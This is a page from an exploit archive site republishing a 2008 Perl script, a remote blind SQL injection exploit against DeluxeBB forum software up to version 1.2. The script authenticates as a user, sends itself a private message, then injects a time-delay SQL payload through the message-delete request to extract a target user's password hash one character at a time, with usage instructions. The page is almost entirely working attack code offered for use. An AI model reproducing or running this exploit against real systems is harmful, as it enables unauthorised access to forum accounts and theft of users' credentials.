首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit
来源:staker[at]hotmail[dot]it 作者:athos 发布时间:2008-12-29  
#!/usr/bin/perl
# --------------------------------------------------
# DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit
# --------------------------------------------------
# by athos - staker[at]hotmail[dot]it
# download on http://deluxebb.com
# --------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix id password target id
# perl xpl.pl localhost/deluxebb deluxebb 5 r00x 1
# --------------------------------------------------
# Note: magic_quotes_gpc off
#       don't add me on msn messenger
#       my email staker.38@gmail.com
# --------------------------------------------------
# Greetz: str0ke,The:Paradox and #cancer
# --------------------------------------------------

use strict;
use Digest::MD5('md5_hex');
use LWP::UserAgent;

my ($hash,$http);
my ($host,$prefix,$user,$pass,$target) = @ARGV;

$http = new LWP::UserAgent(timeout => 5);

if (@ARGV != 5)
{
      print "\n+----------------------------------------------------+\r",
            "\n| DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit |\r",
            "\n+----------------------------------------------------+\r",
            "\nby athos - staker[at]hotmail[dot]it\n",
            "\nUsage     + perl $0 [host/path] [prefix] [ID] [password] [target ID]",
            "\nHost      + localhost/DeluxeBB",
            "\nID        + your user ID",
            "\nPassword  + your password",
            "\nPrefix    + table prefix (default: deluxebb)",
            "\nTarget ID + target id\n";
      exit;
}     

$http->default_header('Cookie' => cookies($user,$pass));

&exploit;

sub getUsername
{
      my ($user_id,$response,@nickname) = $_[0];

      $response = $http->get("http://$host/misc.php?sub=profile&uid=$user_id");
      @nickname = $response->as_string =~ m{<span class="misctext">(.+?)</span>}ig;
     
      return $nickname[1];
}     



sub cookies
{
      my ($username);
      my ($user_id,$password) = @_;
     
      $username = getUsername($user_id);
      $password = md5_hex($password);
     
      return qq{membercookie=$username; memberid=$user_id; memberpw=$password;};
}     
     
     
sub getMsg
{
      my $response = $http->get("http://$host/pm.php?sub=folder&name=inbox");
     
      if ($response->as_string =~ m/pid=(\d+)./i)
      {
            return $1;
      }
      else
      {
            my $content = {
                 to       => getUsername($user),
                 subject  => rand(999),
                 posticon => 'none',
                 rte1     => rand(999),
                 submit   => 'Send'

            }; 
                           
                           
            my $request = $http->post("http://$host/pm.php?sub=newpm",$content);
            my $read_id = $http->get("http://$host/pm.php?sub=folder&name=inbox");
           
            if ($read_id->content =~ /pid=(\d+)./i)
            {
                  return $1;
            }
      }     
}     
   

sub sql
{
      my ($i,$j,$sql) = (shift,shift,undef);
     
      $sql = "%27+OR+(SELECT+IF((ASCII(SUBSTRING(pass,$i,1))=$j),".
             "benchmark(200000000,CHAR(0)),0)+FROM+${prefix}_users".
             "+WHERE uid=$target))%23";
            
      return $sql;       
}       
   

sub delay
{
      my ($tm1,$tm2) = (undef,undef);
      my ($msg,$sql) = @_;
     
      $tm1 = time();
     
      $http->get("http://$host/pm.php?sub=do&submit=Delete&delete$msg=$sql");

      $tm2 = time();
     
      return $tm2 - $tm1;
}
   
   
sub exploit
{
      my ($i,$ord) = (1,undef);
      my @chr = (48..57, 97..102);
     
      for ($i..32)
      {
            foreach $ord(@chr)
            {
                  if (delay(&getMsg,&sql($i,$ord)) >= 5)
                  {
                        syswrite(STDOUT,chr($ord)); $hash .= chr($ord);
                        last;
                        $i++;
                  }     
                 
                  if ($i == 2 and not defined $hash)
                  {
                        syswrite(STDOUT,"Exploit Failed!\n");
                        exit;
                  }
            }
      }                
}   

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hex Workshop 5.1.4 (Color Mapp
·Chilkat FTP ActiveX (SaveLastE
·Joomla Component mdigg 2.2.8 B
·BulletProof FTP Client (.bps F
·Joomla Component com_ice 0.5b2
·Joomla Component com_liveticke
·MS Windows Media Player * (.WA
·Flexphplink Pro Arbitrary File
·Amaya Web Browser <= 11.0.1 Re
·TaskDriver <= 1.3 Remote Chang
·Microsoft Internet Explorer XM
·Ultimate PHP Board <= 2.2.1 (l
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved